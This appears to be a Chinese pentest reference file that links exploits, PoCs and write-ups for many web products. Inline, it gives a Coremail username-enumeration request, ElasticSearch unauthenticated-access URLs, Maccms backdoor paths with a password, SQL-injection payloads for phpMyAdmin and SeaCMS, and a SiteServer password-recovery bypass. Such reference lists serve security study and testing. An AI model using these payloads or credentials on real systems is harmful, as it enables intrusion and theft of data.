## Apache SuperSet

[CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置](https://github.com/horizon3ai/CVE-2023-27524)

## Big-IP

[BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388](https://github.com/TomArni680/CVE-2022-1388-POC)

## Coremail

版本信息

```
/coremail/s/json?func=verify
```

爆破用户名

```
/coremail/s?func=user:getLocaleUserName
{
"email":"zhangsan"
"defaultURL":"1"
}
```

[导出coremail通讯录](https://github.com/newcodor/coremail_address_list_export)

[Coremail漏洞](https://github.com/HackJava/HackCoremail)

[Coremail邮件系统组织通讯录一键导出](https://github.com/dpu/coremail-address-book)

[Coremail nday 任意密码修改复现](https://mp.weixin.qq.com/s/YZwMvWiqVNh5Locf-eBCVw)

[yuxiaoyou123/coremail-exp](https://github.com/yuxiaoyou123/coremail-exp)

[coremail漏洞之我见(碎碎念)](https://mp.weixin.qq.com/s/q6VUmRxBPLKT35qPHr4gSw)

[jimoyong/CoreMailUploadRce](https://github.com/jimoyong/CoreMailUploadRce)

## Confluence

[Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具](https://github.com/ad-calcium/CVE-2023-22515)

[CVE-2022-26134 概念证明](https://github.com/jbaines-r7/through_the_wire)

[CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL)

[Confluence 文件读取漏洞(CVE-2019-3394)分析](https://paper.seebug.org/1025/)

[Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析](https://paper.seebug.org/884/)

[Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)

[CVE-2021-26084-Confluence命令执行 全版本内存马注入](https://mp.weixin.qq.com/s/wbIvFQmkdJH6g6ZKBFXyYQ)

[alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)

## DedeCMS

[织梦全版本漏洞扫描工具](https://github.com/lengjibo/dedecmscan)

[解决DEDECMS历史难题--找后台目录](https://xz.aliyun.com/t/2064)

[Dedecms 最新版漏洞收集并复现学习](https://blog.szfszf.top/article/25/)

[Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms](https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html)

[DedeCMS 未授权RCE漏洞原理及影响面分析](https://mp.weixin.qq.com/s/KZ7O0JRLvk4_O1GvL5lMVw)

[Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability](https://srcincite.io/pocs/src-2021-0029.py.txt)

## Django

[CVE-2020-7471 Django StringAgg SQL Injection漏洞复现](https://mp.weixin.qq.com/s/j4OL927w3JtL1k2hFvmffw)

## Discuz

[Discuz漏洞整理.pdf](https://github.com/Awrrays/Pentest-Tips/blob/main/Discuz%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.pdf)

[Discuz!X 前台任意文件删除漏洞深入解析](https://xz.aliyun.com/t/34)

[Discuz!因Memcached未授权访问导致的RCE](https://xz.aliyun.com/t/2018)

[Discuz!X 个人账户删除漏洞](https://xz.aliyun.com/t/2297)

[Discuz!x3.4后台文件任意删除漏洞分析](https://xz.aliyun.com/t/4725)

[DiscuzX v3.4 排行页面存储型XSS漏洞 分析](https://xz.aliyun.com/t/2899)

[WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2](https://php.mengsec.com/bugs/wooyun-2015-0137991.html)

[Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)](https://paper.seebug.org/763/)

[FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729)

[实例分析 DiscuzX 3.4 SSRF漏洞](https://mp.weixin.qq.com/s/TRCdXZU8v1NsbFhZKLa1Qw)

[Discuz x3.4前台SSRF](https://www.codercto.com/a/43029.html)

[theLSA/discuz-ml-rce](https://github.com/theLSA/discuz-ml-rce)

[Discuz! ML远程代码执行(CVE-2019-13956)](https://www.cnblogs.com/yuzly/p/11386755.html)

[Discuz!ML V3.X 代码注入分析](https://xz.aliyun.com/t/5638)

## Drupal

[CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/)

[Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)](https://vulhub.org/#/environments/drupal/CVE-2017-6920/)

https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md

[pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600)

[dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)

[Drupal 远程代码执行漏洞(CVE-2018-7602)](https://vulhub.org/#/environments/drupal/CVE-2018-7602/)

[CVE-2018-7600/drupa7-CVE-2018-7602.py](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py)

[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)

https://vulhub.org/#/environments/drupal/CVE-2019-6339/

[Drupal(CVE-2020-28948/CVE-2020-28949)分析](https://mp.weixin.qq.com/s/-5z2gCrstyCLOOzgf1tZTg)

## ECshop

[ECShop 2.x/3.x SQL注入/任意代码执行漏洞](https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md)

[ecshop2.x 代码执行](https://paper.seebug.org/691/)

[ecshop后台getshell](http://www.zstreamer.cn/2020/09/09/ecshop2.7_3.6后台getshell/)

## ElasticSearch

- `http://[ip]:9200`
- `http://[ip]:9200/_plugin/head/` web 管理界面
- `http://[ip]:9200/hello/_search?pretty&size=50&from=50`
- `http://[ip]:9200/_cat/indices`
- `http://[ip]:9200/_river/_search` 查看数据库敏感信息
- `http://[ip]:9200/_nodes` 查看节点数据
- `http://[ip]:9200/_cat/indices?v` 查看当前节点的所有 Index
- `http://[ip]:9200/_search?pretty=true` 查询所有的 index, type
- [Elasticvue](https://chrome.google.com/webstore/detail/elasticvue/hkedbapjpblbodpgbajblpnlpenaebaa?hl=en-US) - 进行未授权访问漏洞利用的插件

[ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/)

[Remote Code Execution in Elasticsearch - CVE-2015-1427](https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/)

[ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/)

https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/

[Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)](https://www.freebuf.com/vuls/99942.html)

https://blog.csdn.net/u013613428/article/details/121884479

## Exchange

[xchange邮件服务器的账户爆破](https://github.com/grayddq/EBurst)

[利用NTLM Hash读取Exchange邮件](https://github.com/Ridter/GetMail)

[Exchange渗透测试总结](https://www.anquanke.com/post/id/184342)

## ewebeditor

[ewebeditor 编辑器漏洞总结](https://www.0dayhack.com/post-426.html)

## Fastadmin

[fastadmin最新版前台getshell漏洞](https://mp.weixin.qq.com/s/XR6p6sf3__QtpMjJuJEjfA)
[fastadmin文件管理插件](https://github.com/WenchaoLin/Filex)

## FastJson

[基于dbcp的fastjson rce 回显](https://github.com/depycode/fastjson-local-echo)

[Fastjson-Gadgets-自动扫描仪](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner)

[Fastjson姿势技巧集合](https://github.com/safe6Sec/Fastjson)

[fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.](https://github.com/Y4er/fastjson-bypass-autotype-1.2.68)

## Fckeditor

[fck2.4.3文件上传通杀脚本](https://github.com/chaosec2021/FCKeditor-2.4.3--exp)

[Fckeditor上传漏洞利用拿shell总结](https://www.0dayhack.com/post-413.html)

## Flask

[Flask 内存马](https://github.com/iceyhexman/flask_memory_shell)

## GeoServer

[CVE-2023-25157 - GeoServer SQL 注入 - PoC](https://github.com/win3zz/CVE-2023-25157/)

## Gitlab

[gitlab-version-nse](https://github.com/righel/gitlab-version-nse)

[通过the bulk imports UploadsPipeline任意文件读取](https://gitlab.com/gitlab-org/gitlab/-/issues/349524)

[CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)

[CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)

[GitLab任意文件读取漏洞复现](https://mp.weixin.qq.com/s/HKZHUs_bTN-00_8HsU6grA)

[Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052)

[CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992)

## Gitea

[Gitea 存储库迁移远程命令执行漏洞。](https://github.com/wuhan005/CVE-2022-30781)

[Go代码审计 - gitea 远程命令执行漏洞链](https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html)

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce

## Harbor

https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg

https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/

https://www.youtube.com/watch?v=v8Isqy4yR3Q

## Hikvision

[Hikvision 流媒体管理服务器敏感信息泄漏](https://github.com/Henry4E36/HikvisionInformation)
[海康威视 CVE-2021-36260 RCE 漏洞](https://github.com/Cuerz/CVE-2021-36260)

[海康威视综合安防平台后渗透利用工具](https://github.com/wafinfo/Hikvision)

[HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html)

[HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)

[HiKVISION 综合安防管理平台 files 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[HiKVISION 综合安防管理平台 report 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20report%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

[HiKVISION 综合安防管理平台 env 信息泄漏漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html)

[综合安防管理平台 _svm_api_v1_productFile 远程命令执行](https://mp.weixin.qq.com/s?__biz=MzIyMjkzMzY4Ng==&mid=2247505219&idx=1&sn=f48d189da00e2f7040a3b62de580d8c1)

## 海康威视IP网络对讲广播系统

[【漏洞复现】海康威视IP网络对讲广播系统存在命令注入漏洞](https://mp.weixin.qq.com/s?__biz=MzU5MTc1NTE0Ng==&mid=2247485360&idx=1&sn=aea143927b6bd96689f5d435bfb8df6c)

## IIS

[多线程批量检测IIS短文件名漏洞+漏洞利用](https://github.com/VMsec/iisScaner)

[CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit](https://paper.seebug.org/259/)

[lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)

[edwardz246003/IIS_exploit](https://github.com/edwardz246003/IIS_exploit)

## I Doc View 在线文档预览系统

[【漏洞复现】I Doc View 在线文档预览系统远程代码执行漏洞](https://mp.weixin.qq.com/s?__biz=MzkxNTU5NjM5MQ==&mid=2247484409&idx=1&sn=ec6b363cbab59af3e323b3c18425b017&chksm=c15df6f1f62a7fe7ef6538e339eb29b59aa313a9e4c85f06482104f535ccc22fdcf83bbd2ef5&scene=126&sessionid=1701682077&key=1afad7311c1000c6326803e9993c3c3655685ec951d2506e5c3879b5677aaf2e6458039c2819a39d8ae10924fb7bc3801ac1eef39a661e9fa79211b8ba2fdfa2c640b23a6b917d9e431bc0f625f47fe16e7dcaa1d68152df42bed5848fd2efb0eda64c3b2a6765a3feb931a321c5edb2911a15b1e201ed23c21536122e4cb91f&ascene=15&uin=MzgxODQ4MjMz&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_c63b035bdde2&countrycode=GY&exportkey=n_ChQIAhIQ7Q315IOTslTK%2FxQwXGrc8RLmAQIE97dBBAEAAAAAAGIzN77M9Z8AAAAOpnltbLcz9gKNyK89dVj0u9EpNejbnNVOqEwJ4P6GYsvS0ML6oYIp1QqiHaFhhv%2FiWbMiN5JeGmU4kXOZzLVgs5F5lGq6Ld7BddxZK1XubANs13KMx3EV6BxC9PkDAobbJnFHhnB08kTxP%2F6r1jkRhFNUiEgGZoc%2BZWIVIyNXOX2NlJKwXjUMkuMi8PiN%2BPqU3zpfOqydlt%2F1IQlxoESqgm72uT8gP05hHQHf0UQmGlmiJcvcu7HumCvC0MA%2FpSugSDM7ch1bWlFQNDC1cwee&acctmode=0&pass_ticket=A4qxtGK0O4LeaDLKYYXNijQqeFho03G%2B90v3l9RyysEVcEcvjTMQ8cVu%2FWiZLpAuvaj7W%2BgV1ofOSy%2FnY1C2Gg%3D%3D&wx_header=0&fontgear=2)

## IP-Guard

[【漏洞复现】IP-guard WebServer 远程命令执行漏洞](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247486971&idx=1&sn=11a6cbd4db9a45976beb39fe613a3010)

## Jboss

[JBOSS和其他 Java 反序列化漏洞验证和利用工具](https://github.com/joaomatosf/jexboss)

[jboss常见漏洞复现](https://www.xpshuai.cn/posts/60637/)

[Jboss漏洞总结](http://www.zstreamer.cn/2020/07/09/Jboss漏洞总结/)

[Red Hat JBoss EAP - Deserialization of Untrusted Data](https://www.exploit-db.com/exploits/40842)

[JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)](https://github.com/vulhub/vulhub/blob/master/jboss/CVE-2017-7504/README.md)

[yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149)

[jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149)

https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

[JBoss JMXInvokerServlet 反序列化漏洞](https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md)

## JeecgBoot

[jmreport/qurestSql 未授权SQL注入批量扫描poc](https://github.com/MzzdToT/CVE-2023-1454)

## Jetty

https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md

https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md

## Jenkins

[awesome-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)

[Hacking Jenkins Part 1 - Play with Dynamic Routing](https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/)

[Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/)

[Jenkins RCE漏洞分析汇总](http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/)

[安全研究 | Jenkins漏洞分析](https://www.freebuf.com/news/242764.html)

[Jenkins漏洞探测、用户抓取爆破](https://github.com/blackye/Jenkins)

[Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录](https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w)

[Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog](https://www.angelwhu.com/blog/?p=539)

[jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392)

## Joomla

[CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0](https://github.com/stefanlucas/Exploit-Joomla)

[Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析](https://paper.seebug.org/305/)

[HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)

## JumpServer

[JumpServer远程执行漏洞 复现](https://www.o2oxy.cn/2921.html)

[JumpServer远程命令执行你可能不知道的点(附利用工具)](https://mp.weixin.qq.com/s/lbcYzNsiOYZRwQzAIYxg3g)

[Skactor/jumpserver_rce](https://github.com/Skactor/jumpserver_rce)

[Veraxy00/Jumpserver-EXP](https://github.com/Veraxy00/Jumpserver-EXP)

[Jumpserver安全一窥:Sep系列漏洞深度解析](https://mp.weixin.qq.com/s/3iAn_aUNg8k5qW34Yb21Bw)

[JumpServer 密码重置漏洞](https://github.com/C1ph3rX13/CVE-2023-42820)

[JumpServer 任意文件写入漏洞 CVE-2023-42819 + CVE-2023-42820 = GetShell](https://github.com/C1ph3rX13/CVE-2023-42819)

## Kindeditor

[kindeditor<=4.1.5上传漏洞复现](https://www.cnblogs.com/backlion/p/10421405.html)

[大批量Kindeditor文件上传事件的漏洞分析](https://www.freebuf.com/column/202148.html)

## Laravel

[Laravel 6.x/7.x的一条执行代码的反序列化利用链](https://www.o2oxy.cn/3588.html)

[LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION](https://www.ambionics.io/blog/laravel-debug-rce)

[漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现](https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g)

[再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞](https://www.freebuf.com/vuls/264662.html)

[ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)

[Laravel 8.x image upload bypass](https://infosecwriteups.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b)

## Log4j

[log4j solr rce](https://twitter.com/pyn3rd/status/1470359076617932800)

[受log4j影响的软件](https://github.com/NCSC-NL/log4shell/tree/main/software)

[‍️ 🤬CVE-2021-44228 - LOG4J Java 漏洞利用 - WAF 绕过技巧](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)

[Log4j漏洞至今仍被持续利用](https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/)

[Log4j-Payloads](https://github.com/queencitycyber/Log4j-Payloads)

## Maccms

```
maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
密码 WorldFilledWithLove
```

[Maccms v10后门](http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml)

## Milesight

[Milesight VPN server.js 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/iot/Milesight/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)

## MinIO

[容器与云的碰撞——一次对MinIO的测试](https://cloud.tencent.com/developer/article/1785462)

[(CVE-2023-28432) | MinIO verify 接口敏感信息泄露漏洞](https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486024&idx=1&sn=505829c79bc3bdc2b6598cdaf104666b&chksm=c1f925faf68eacec10fbc833c87f8f95578ebe0cd86b9d54690d471fd1d10eb44bf145d6be6a)

https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36

## MessageSolution

[CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞](https://github.com/Henry4E36/CNVD-2021-10543)

## MetInfo

[MetInfo5.3.19安装过程过滤不严导致Getshell](https://bbs.ichunqiu.com/thread-35305-1-17.html)

[MetInfo6.0.0漏洞集合(一)](https://bbs.ichunqiu.com/thread-43416-1-7.html)

[MetInfo6.1.0 漏洞(二)](https://bbs.ichunqiu.com/thread-43625-1-4.html)

[Metinfo 6.1.2 SQL注入](https://bbs.ichunqiu.com/thread-46687-1-1.html)

[metinfo最新版本后台getshell](https://bbs.ichunqiu.com/thread-29686-1-2.html)

[Metinfo7的一些鸡肋漏洞](https://evi1.cn/post/metinfo7-bug/)

[Metinfo7.0 SQL Blind Injection](https://github.com/T3qui1a/metinfo_sqlinjection/issues/1)

[CVE-2018-13024复现及一次简单的内网渗透](https://www.freebuf.com/news/193748.html)

## Metabase

[Metabase validate 远程命令执行漏洞 CVE-2023-38646](https://peiqi.wgpsec.org/wiki/webapp/Metabase/Metabase%20validate%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2023-38646.html)

## MeterSphere

[任意文件上传](https://github.com/metersphere/metersphere/issues/8653)

## Nacos

大部分企业的 nacos 的 url 为 /v1/auth/users ,而不是 /nacos/v1/auth/users

[Alibaba Nacos 未授权访问漏洞](https://blog.csdn.net/m0_46257936/article/details/113127814)

https://raw.githubusercontent.com/dwisiswant0/nuclei-templates/add/GHSL-2020-325/cves/2021/CVE-2021-29441.yaml

[Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355)

[Nacos密码碰撞](https://www.jisuan.mobi/nX7.html)

[Nacos Hessian 反序列化漏洞利用工具](https://github.com/c0olw/NacosRce)

## NETGEAR ProSafe SSL VPN

[NETGEAR ProSafe SSL VPN SQL 注入漏洞](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)

## Nexus

[Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)](https://vulhub.org/#/environments/nexus/CVE-2019-7238/)

[mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)

[jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)

[Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论](https://www.cnblogs.com/magic-zero/p/12641068.html)

[aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)

[CVE-2020-29436:Nexus3 XML外部实体注入复现](https://mp.weixin.qq.com/s/u6LWHvNEieQsV-ny6xwMmQ)

## NPS

[carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)

## Openfire

[后台插件getshell](https://github.com/22CB7139/openfire_shells)

[openfire AES和Blowfish加解密工具](https://github.com/ca3tie1/OpenFireEncryptor)

[『漏洞复现』记 Openfire 身份认证绕过漏洞导致 RCE](https://mp.weixin.qq.com/s?__biz=Mzg4NTA0MzgxNQ==&mid=2247488691&idx=1&sn=60271069ce409bb3d3198df6a265b44b)

## Oracle Access Manager

[CVE-2021-35587 Oracle Access Manager 未经身份验证的攻击者漏洞 ](https://github.com/antx-code/CVE-2021-35587/blob/main/CVE-2021-35587.py)

## Outlook

[ 一个玩 Outlook 的小工具](https://github.com/eksperience/KnockOutlook)

## Panalog 日志审计系统

[panalog日志审计系统任意用户创建漏洞和后台命令执行](https://mp.weixin.qq.com/s/98kn5ry-C-IeKY2MDebjLw)

## PHPMailer

[PHPMailer 任意文件读取漏洞](https://mp.weixin.qq.com/s/y7N3CD1683W2WX-naT5HCA)

## phpMyAdmin

[phpMyAdmin新姿势getshell](https://zhuanlan.zhihu.com/p/25957366)

[phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/40185)

[phpMyAdmin 4.7.x CSRF 漏洞利用](https://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/)

[phpmyadmin4.8.1后台getshell](https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog)

[CVE-2018-12613漏洞学习总结](https://mp.weixin.qq.com/s/zGJxjtDLkw9CMHGfNRu1nw)

[phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写](https://bbs.zkaq.cn/t/4570.html)

[CVE-2019-12922 4.9.0.1 CSRF](https://www.hedysx.com/bug/2398.html)

CVE-2020-26935 phpmyadmin后台SQL注入

```mysql
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```

[phpMyAdmin 5.1.1 - XSS](https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A)

## PHPMyWind

[记一次渗透测试历程](https://xz.aliyun.com/t/6018)

[phpmywind最新版sql注入以及后台目录遍历和文件读取](https://blog.csdn.net/dengzhasong7076/article/details/102139691)

[PHPMyWind v5.5 审计记录](https://bbs.ichunqiu.com/thread-46703-1-1.html)

https://www.exploit-db.com/exploits/42535

## PigCMS

[PigCMS action_flashUpload 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/cms/PigCMS/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)

## Resin

[针对Resin服务的攻击向量整理](https://blkstone.github.io/2017/10/30/resin-attack-vectors/)

[Resin任意文件读取漏洞](https://www.cnblogs.com/KevinGeorge/p/8953731.html)

[Resin容器文件解析漏洞深入分析](https://mp.weixin.qq.com/s/eZAG3Ze0ytd5l7ci1nb-qg)

## SeaCMS

app="海洋CMS"

攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。

```
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```

## Shiro

[基于SerializationDumper的Shiro Cookie序列化数据解密小工具](https://github.com/r00tuser111/SerializationDumper-Shiro)

[改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool)

[shiro-550-with-NoCC](https://github.com/dr0op/shiro-550-with-NoCC)

[j1anFen/shiro_attack](https://github.com/j1anFen/shiro_attack)

[ShiroExploit-Deprecated](https://github.com/feihong-cs/ShiroExploit-Deprecated)

[Echox1/ShiroExploit](https://github.com/Echox1/ShiroExploit)

[Ares-X/shiro-exploit](https://github.com/Ares-X/shiro-exploit)

[shiro 反序列 命令执行辅助检测工具](https://github.com/wyzxxz/shiro_rce_tool)

[burp插件 ShiroScan 主要用于框架、无dnslog key检测](https://github.com/Daybr4ak/ShiroScan)

## ShopXO

[ShopXO download 任意文件读取漏洞 CNVD-2021-15822](https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog)

## ShowDoc

[ShowDoc 前台任意文件上传](http://47.115.146.38/2021/04/27/showdoc/)

## SiteServer

**找回密码**

管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)

访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码

[代码审计 | SiteServerCMS身份认证机制](https://www.freebuf.com/vuls/228448.html)

[代码审计 | SiteServerCMS密钥攻击](https://www.freebuf.com/vuls/234549.html)

[某Server CMS最新6.8.3版本验证码绕过&后台多处注入](https://xz.aliyun.com/t/4119)

[简记野生应急捕获到的siteserver远程模板下载Getshell漏洞](https://www.freebuf.com/articles/web/195105.html)

[zhaoweiho/SiteServer-CMS-Remote-download-Getshell](https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell)

## Sophos Firewall

[CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)

## Spring

[CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A)

[Spring-cloud-function SpEL RCE, Vultarget & Poc](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE)

[SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit)

[一款针对SpringBootEnv页面进行快速漏洞利用](https://github.com/0x727/SpringBootExploit)

[Spring漏洞利用](https://github.com/Crush-sudo/pocsuite/tree/master/Spring)

[Spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks)

[Spring扫描器](https://github.com/0xsp-SRD/OffensivePascal/tree/main/SpringCore-Scanner)

[HeapDump敏感信息提取工具](https://github.com/whwlsfb/JDumpSpider)

[基于springboot和spring security的Java web常见漏洞及安全代码](https://github.com/JoyChou93/java-sec-code)

[SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit)

## Struts2

[Struts2全漏洞扫描利用工具](https://github.com/HatBoy/Struts2-Scan)

